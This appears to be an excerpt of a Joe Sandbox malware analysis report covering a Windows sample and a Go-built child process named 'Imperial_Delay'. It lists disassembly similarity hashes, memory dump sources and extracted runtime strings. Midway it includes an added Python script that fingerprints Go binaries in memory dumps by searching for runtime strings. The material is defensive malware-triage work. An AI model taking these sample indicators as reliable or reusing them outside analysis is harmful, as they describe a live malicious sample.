  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: ErrorLast$abort
  • String ID:
  • API String ID: 1447195878-0
  • Opcode ID: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
  • Instruction ID: 67d99b1d5663e1b0d1c1f8cee6a3b7e16ddfeb7ab0753f86f6fa21bc28d77d09
  • Opcode Fuzzy Hash: 1eac2c9eaf67b8ca3847dbe3d1f8f0efe6c7906f8c8004aecd08eca7f3519a74
  • Instruction Fuzzy Hash: 3E019E20F0D20652FAA87735AE5937CD182DF44780F9C0939D96E837D6EF6CA8404230
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: CapsDevice$Release
  • String ID:
  • API String ID: 1035833867-0
  • Opcode ID: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
  • Instruction ID: 638960e352590ae05aaa4f81830e948ddddd9d93acae068bfab199be9f8d378b
  • Opcode Fuzzy Hash: ff8273f54fae2fdeddf750fc197cbb143a8813763f49c02ea24deae08297ea60
  • Instruction Fuzzy Hash: A8E04870F0974682FF087BB5AC59176E191EF48B45FC44039C80E473A0EF3EA4854720
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: _invalid_parameter_noinfo
  • String ID: e+000$gfff
  • API String ID: 3215553584-3030954782
  • Opcode ID: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
  • Instruction ID: 31876396420b1d7a35f90179e2742b796cdf578922a3dc54305214479c91cdc1
  • Opcode Fuzzy Hash: 180a713344d636e9f2ed807591016252dc9e7b78ba41607e6542638bc7fc855a
  • Instruction Fuzzy Hash: 1B512562B197C296E7259B359C40369AB91EF81B90F8C8271C79C8BBD5CF3DD444C710
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
  • String ID: SIZE
  • API String ID: 449872665-3243624926
  • Opcode ID: f97aaaf949171a2904a8fe23ed725e9e394508c7fb8bb295341962652909a67e
  • Instruction ID: 18f9b08219de69d63912504081f23f9c09638a3517c239abf97ae508ead93838
  • Opcode Fuzzy Hash: f97aaaf949171a2904a8fe23ed725e9e394508c7fb8bb295341962652909a67e
  • Instruction Fuzzy Hash: A241B362A1C782A5EA10BB15E8453BFE350EFC9790F904231EA9D066DAEFBFD541C710
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: FileModuleName_invalid_parameter_noinfo
  • String ID: C:\Users\user\Desktop\HLZwUhcJ28.exe
  • API String ID: 3307058713-1136380477
  • Opcode ID: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
  • Instruction ID: 62f67f09bbdd0a83d343b3fdd3b2bb76cb0aacd7e3b651c0653ecb7adefd8e55
  • Opcode Fuzzy Hash: d741bd9ac7dff40685a7c943ead455491a0e4fb3fffc5812c1fd7ad0a856b466
  • Instruction Fuzzy Hash: 1C419232A08796A9E715EF259C501BDF794EF447D4B98403AE94D87B85DF3EE8418320
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: ByteCharMultiWide_snwprintf
  • String ID: $%s$@%s
  • API String ID: 2650857296-834177443
  • Opcode ID: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
  • Instruction ID: f4eccb2bd2b6936ed18b15925f80e06c0fc68f31b84d8db74aac39a1a9164566
  • Opcode Fuzzy Hash: 9a1500ef5950f5f5df7c550d69d7960993ad2cdd50597e18fe19dfb01623cb94
  • Instruction Fuzzy Hash: 2131E576B1CA46A5EA20AF65E8407FAA7A0FF84784F801032EE0D07B95DF7EE505C710
Memory Dump Source
  • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
  • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
  • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
  • API ID: DialogParamVisibleWindow
  • String ID: GETPASSWORD1
  • API String ID: 3157717868-3292211884
  • Opcode ID: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
  • Instruction ID: c759e39f0235e01c38ede2ab9c991f42fc7ef131b49d1bd69416bb5ab6276af3
  • Opcode Fuzzy Hash: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
  • Instruction Fuzzy Hash: E5315025B0D6C2A9EA11AF26AC641BABB60FF49B84FC80076D98D07756CF2DE444C370
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                          • String ID: @
                                                                                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                                                                                          • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                          • Instruction ID: e22ba67c98a58c1e5660ef45e92c2ec4f95958eb8fd90291091143104ba1aee9
                                                                                                                                                                          • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                          • Instruction Fuzzy Hash: AB21D522E09B8281EB609B249C98339A651EF45774FAC0336D6AE477E5CF3DD981C320
                                                                                                                                                                          APIs
                                                                                                                                                                          • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70ECF57EE), ref: 00007FF70ECF788C
                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70ECF57EE), ref: 00007FF70ECF78D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                          • String ID: csm
                                                                                                                                                                          • API String ID: 2573137834-1018135373
                                                                                                                                                                          • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                          • Instruction ID: 9c5fe7e9648abc1819b089b964fbf59e414f7803d859e74b452aaf920a3d1c9c
                                                                                                                                                                          • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B115E32A18B8592EB249F15F84026AB7A1FF88B88F584232EF8D17758DF3DD551CB00
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindHandleModuleResource
                                                                                                                                                                          • String ID: RTL
                                                                                                                                                                          • API String ID: 3537982541-834975271
                                                                                                                                                                          • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                          • Instruction ID: 50f45de7625db5ef3340614513294989abefce5e91a6bc9e415bdd5a8c2bb51f
                                                                                                                                                                          • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                          • Instruction Fuzzy Hash: E3D017A1F0D70782FF296B63AC4837556509F1AB41F8C0039C82D47790EF6E91988764
Strings
• runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.Opaque = %qhttp: multipart handled by ParseMul, xrefs: 009BA556
• %, xrefs: 009BA5EE
• runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 009BA4FB
• runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!http: invalid byte %q in Cookie.Valueunexpected CONTINUATION for stream %dh, xrefs: 009BA5E5
• bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2deb, xrefs: 009BA4D4
• runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.O, xrefs: 009BA5B1
• ) @s -> Pn=][}]i)> +%!)(tvrRuUeEaAlLsS01bBoOxX+-nNiIfFpP; h2te80]:%T">OK])//":\t\r\n\"ip53._25\a\f[] %-ONWSLlLtLuMnCcCfCoCsLmLoMcMeNdNlNoPcPdPePfPiPoPsScSkSmSoZlZpZsYi=#OUCNST"iv-- ToA4V1V6V2V3V5A3*.}}MX0b0x0X0o%sV7/.v7v6,go==!=no%%jsorgegtleltne, xrefs: 009BA4B9
• VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerhttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed r, xrefs: 009BA52F
• CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 009BA58A
Memory Dump Source
• Source File: 00000001.00000002.1878419638.0000000000981000.00000020.00000001.01000000.00000009.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000001.00000002.1878406241.0000000000980000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1878934216.0000000001166000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1878934216.00000000013F3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879422155.0000000001968000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879436486.000000000196A000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879449636.000000000196E000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879462623.000000000196F000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879475252.0000000001970000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879488305.0000000001973000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879501201.0000000001974000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879530337.00000000019B4000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879545453.00000000019C0000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879559240.00000000019C1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879572179.00000000019C2000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879584442.00000000019C3000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879598425.00000000019C6000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879612799.00000000019C8000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879612799.00000000019D1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879612799.00000000019F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879612799.00000000019F8000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879669718.00000000019FB000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879682459.00000000019FC000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1879682459.0000000001A65000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_980000_Imperial_Delay.jbxd
Similarity
• API ID:
• String ID: %$) @s -> Pn=][}]i)> +%!)(tvrRuUeEaAlLsS01bBoOxX+-nNiIfFpP; h2te80]:%T">OK])//":\t\r\n\"ip53._25\a\f[] %-ONWSLlLtLuMnCcCfCoCsLmLoMcMeNdNlNoPcPdPePfPiPoPsScSkSmSoZlZpZsYi=#OUCNST"iv-- ToA4V1V6V2V3V5A3*.}}MX0b0x0X0o%sV7/.v7v6,go==!=no%%jsorgegtleltne$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerhttp2: aborting request body writehttp: persistConn.readLoop exitinghttp: read on closed r$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2deb$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.O$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!http: invalid byte %q in Cookie.Valueunexpected CONTINUATION for stream %dh$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zerohttp: putIdleConn: connection is in bad stateinvalid request :path %q from URL.Opaque = %qhttp: multipart handled by ParseMul$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
• API String ID: 0-2464228840
• Opcode ID: aff75ba3bf0c971c4c41da543a799e7275d212e99a772a1a48a18af560ad39e1
• Instruction ID: d65f1fffce2f0da8cc4fe8ac86248758ac8ece9486461d054cff786cb21c97d3
• Opcode Fuzzy Hash: aff75ba3bf0c971c4c41da543a799e7275d212e99a772a1a48a18af560ad39e1
• Instruction Fuzzy Hash: 0691EEB4509301DFD310EF68C695B9ABBE4BF88724F00892DE4988B352E7B5D949CF52
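The run-together strings above ("all goroutines are asleep - deadlock!", "runtime: mcall called on m->g0 stack", "exitsyscall: syscall frame is no longer valid") are Go runtime panic and error messages. The Go linker stores string literals back to back without terminators, which is why the sandbox's string extractor reports them as long fused fragments rather than one message per entry. The script below is an added example, not Joe Sandbox output or the sample's code: it scans a raw dump for a handful of those runtime markers and reports their addresses relative to an image base, so a triage analyst can confirm a Go-built payload from a memory dump alone. The dump it scans is constructed inline; the offsets it produces are not the report's xrefs.

```python
"""Fingerprint a Go runtime inside a raw memory dump by scanning for
runtime panic/error strings of the kind listed in the sandbox report.

Added example. The dump is fabricated inline; nothing here reads the
real .sdmp files from the report.
"""
from __future__ import annotations

import re

# Distinctive Go runtime messages (verbatim fragments also seen in the
# report's string listing). Any one could appear in a non-Go binary that
# embeds Go code, so the heuristic requires several distinct hits.
GO_RUNTIME_MARKERS: tuple[bytes, ...] = (
    b"all goroutines are asleep - deadlock!",
    b"runtime: mcall called on m->g0 stack",
    b"runtime: CreateWaitableTimerEx failed; errno=",
    b"runtime.minit: duplicatehandle failed",
    b"http: putIdleConn: connection is in bad state",
    b"exitsyscall: syscall frame is no longer valid",
    b"unsafe.String: ptr is nil and len is not zero",
    b"checkdead: no p for timer",
)


def find_go_runtime_markers(blob: bytes, base: int = 0) -> dict[bytes, list[int]]:
    """Return each marker present in `blob` mapped to its address(es).

    `base` is the image base the dump was taken at (0x980000 for the second
    process in the report), so the returned values line up with the
    'xrefs:' addresses the sandbox prints instead of raw file offsets.
    """
    hits: dict[bytes, list[int]] = {}
    for marker in GO_RUNTIME_MARKERS:
        addrs = [m.start() + base for m in re.finditer(re.escape(marker), blob)]
        if addrs:
            hits[marker] = addrs
    return hits


def is_go_binary(blob: bytes, min_markers: int = 3) -> bool:
    """Heuristic: >= min_markers distinct runtime strings => Go-compiled image."""
    return len(find_go_runtime_markers(blob)) >= min_markers


def build_constructed_dump() -> bytes:
    """Fabricated dump for the example. The string table is packed without
    NUL terminators, mimicking how Go lays out literals, so the four
    messages run together exactly as they do in the report's listing."""
    filler = b"\x00" * 0x100
    table = (
        b"runtime: CreateWaitableTimerEx failed; errno="
        b"exitsyscall: syscall frame is no longer valid"
        b"unsafe.String: ptr is nil and len is not zero"
        b"http: putIdleConn: connection is in bad state"
    )
    return filler + table + filler + b"all goroutines are asleep - deadlock!" + filler


if __name__ == "__main__":
    dump = build_constructed_dump()
    for marker, addrs in find_go_runtime_markers(dump, base=0x980000).items():
        print(f"{marker.decode():<48} xrefs: " + ", ".join(f"{a:08X}" for a in addrs))
    print("Go runtime present:", is_go_binary(dump))
```

Run it against a real dump with `find_go_runtime_markers(open(path, "rb").read(), base=0x980000)` and compare the printed addresses with the report's `xrefs:` values; matching addresses confirm which dump region holds the Go string table, and the marker set is easy to extend with other strings from the listing above.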
Strings
• releasep: invalid p statecheckdead: no p for timercheckdead: no m for timerunknown sigtramp callbackunexpected fault address missing stack in newstackbad status in shrinkstackmissing traceGCSweepStartunexpected key value typeExpandEnvironmentStringsWno hex dat, xrefs: 009CAAA7
• p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64nan3float32nan2GOTRACEBACK) at entry+ (targetpc= , plugin: runtime: g : frame.sp=created by %!(BADPREC)bad verb '%0123456789_http2serverhttp2cl, xrefs: 009CAA73
• releasep: invalid argcheckdead: runnable gruntime: newstack at runtime: newstack sp=runtime: confused by pcHeader.textStart= timer data corruptionfeature not supportedhttp: nil Request.URLUNKNOWN_FRAME_TYPE_%dframe_ping_has_streamRoundTrip failure: %vUnhandle, xrefs: 009CAABD
• m->p= p->m=SCHED curg= ctxt: min= max= (...) base Format[]byte' for stringBasic CookiecookieexpectserverclosedmethodExpectPragma</a>.socks socks5CANCELGOAWAYPADDED, val numbernetdns.localreturn.onionip+netdomaingophertelnet390625uint16uint32uint64structch, xrefs: 009CAA27
• releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchout of range%!(BADWIDTH)Cookie.Valuecontent-typemax-forwardshttp2debug=1http2debug=2100-continuerecv_goaway_status code Multi-StatusNot ModifiedUnauthorizedI'm a te, xrefs: 009CAA05
Memory Dump Source
• Source File: 00000001.00000002.1878419638.0000000000981000.00000020.00000001.01000000.00000009.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000001.00000002.1878406241.0000000000980000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1878934216.0000000001166000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1878934216.00000000013F3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                          • Associated: 00000001.00000002.1879422155.0000000001968000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879436486.000000000196A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879449636.000000000196E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879462623.000000000196F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879475252.0000000001970000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879488305.0000000001973000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879501201.0000000001974000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879530337.00000000019B4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879545453.00000000019C0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879559240.00000000019C1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879572179.00000000019C2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879584442.00000000019C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879598425.00000000019C6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019C8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019D1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879612799.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879669718.00000000019FB000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.00000000019FC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          • Associated: 00000001.00000002.1879682459.0000000001A65000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_1_2_980000_Imperial_Delay.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
